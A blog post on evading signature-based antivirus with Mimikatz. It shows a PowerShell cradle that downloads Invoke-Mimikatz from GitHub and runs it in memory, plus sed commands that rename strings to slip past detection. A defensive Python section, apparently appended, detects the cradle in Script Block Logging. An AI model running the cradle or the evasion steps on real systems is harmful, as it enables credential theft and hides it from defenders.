Mimikatz & bypassing AV

This post is a simple shout-out to a blog post I enjoyed reading, one that proves a point I have repeated endlessly throughout Hack like a Pornstar and Hack a Fashion Brand: AV products that rely on signatures (that’s almost all of them) can be trivially bypassed!

If you recall, when executing PowerShell scripts on targets, we used the awesome Invoke-Expression cmdlet, something along the lines of:

$browser = New-Object System.Net.WebClient
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$mimi = $browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
Invoke-Expression($mimi)
Invoke-Mimikatz

The script Invoke-Mimikatz.ps1 was run directly in memory: no file on disk, no antivirus alert.
However, more and more AV vendors are talking about monitoring in-memory activity. “Monitoring” is a big word, really; most of the time they simply look for known strings or keywords. A few perform real behavioural analysis, but even that can be bypassed. We will talk about it in a future post.

How do you avoid being detected, then? A couple of simple tricks:

  • Removing any mention of Mimikatz in the file
  • Removing comments
  • Renaming some function names

That’s it, really. The guys at Black Hills gave us this simple shell script (a handful of sed commands) to do the job efficiently! Thanks, guys!

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
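From the defender’s side, the lesson of the download cradle above and of the renaming trick is the same: a rule that matches on the tool’s name is defeated by a few sed substitutions, while a rule that matches on the behaviour (remote content fetched with WebClient and handed straight to Invoke-Expression) is not, because the renames never touch the cradle. The Python below is an added example written for this post; it is not code from the post or from Black Hills. It runs two rules over constructed script blocks of the kind PowerShell Script Block Logging (Event ID 4104) records: the naive keyword signature, and a behavioural check for the cradle. The sample blocks, the placeholder URLs and the indicator names are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample script blocks (not taken from the post) standing in for
# what PowerShell Script Block Logging (Event ID 4104) records at execution.
SAMPLE_SCRIPT_BLOCKS: Dict[str, str] = {
    # The unmodified cradle: the tool name is still visible.
    "cradle_original": (
        '$browser = New-Object System.Net.WebClient\n'
        '$mimi = $browser.DownloadString("https://example.invalid/Invoke-Mimikatz.ps1")\n'
        'Invoke-Expression($mimi)\n'
        'Invoke-Mimikatz'
    ),
    # The same cradle after the renaming trick: no "Mimikatz" string anywhere,
    # but the download-and-evaluate behaviour is unchanged.
    "cradle_renamed": (
        '$browser = New-Object System.Net.WebClient\n'
        '$m = $browser.DownloadString("https://example.invalid/im.ps1")\n'
        'IEX($m)\n'
        'Invoke-Mimidogz'
    ),
    # A benign administrative script for comparison.
    "benign_admin": 'Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }',
}

# Rule 1: the naive signature, a single keyword.
KEYWORD_SIGNATURE = re.compile(r"mimikatz", re.IGNORECASE)

# Rule 2: behavioural indicators of a download cradle, independent of any
# tool name. The indicator names are our own labels for this example.
CRADLE_INDICATORS: Dict[str, "re.Pattern"] = {
    "webclient": re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.IGNORECASE),
    "download": re.compile(r"\.Download(?:String|Data|File)\s*\(", re.IGNORECASE),
    "eval": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE),
}


def keyword_hit(script_block: str) -> bool:
    """Naive signature check: does the literal tool name appear anywhere?"""
    return KEYWORD_SIGNATURE.search(script_block) is not None


def cradle_indicators(script_block: str) -> List[str]:
    """Return the names of the behavioural indicators present in the block."""
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(script_block)]


def is_download_cradle(script_block: str) -> bool:
    """Flag 'fetch remote content, then evaluate it', whatever it is called."""
    hits = cradle_indicators(script_block)
    return "download" in hits and "eval" in hits


def triage(blocks: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Run both rules over every logged block and summarise the verdicts."""
    return {
        name: {
            "keyword_signature": keyword_hit(body),
            "indicators": cradle_indicators(body),
            "download_cradle": is_download_cradle(body),
        }
        for name, body in blocks.items()
    }


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{name:16} keyword={str(verdict['keyword_signature']):5} "
              f"cradle={str(verdict['download_cradle']):5} "
              f"indicators={verdict['indicators']}")
```

Running it shows the keyword rule firing only on the original block, while the cradle rule fires on both the original and the renamed block and stays quiet on the admin script. That is the check worth having in a SIEM: hunt Script Block Logging for the fetch-then-evaluate pattern rather than for a name that one sed line can change. Note also that the renamed script is still the same script once it executes, which is why logging the script block at run time (and AMSI, which sees the content handed to the engine) gives a defender more to work with than scanning for strings in a file that never touches disk.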
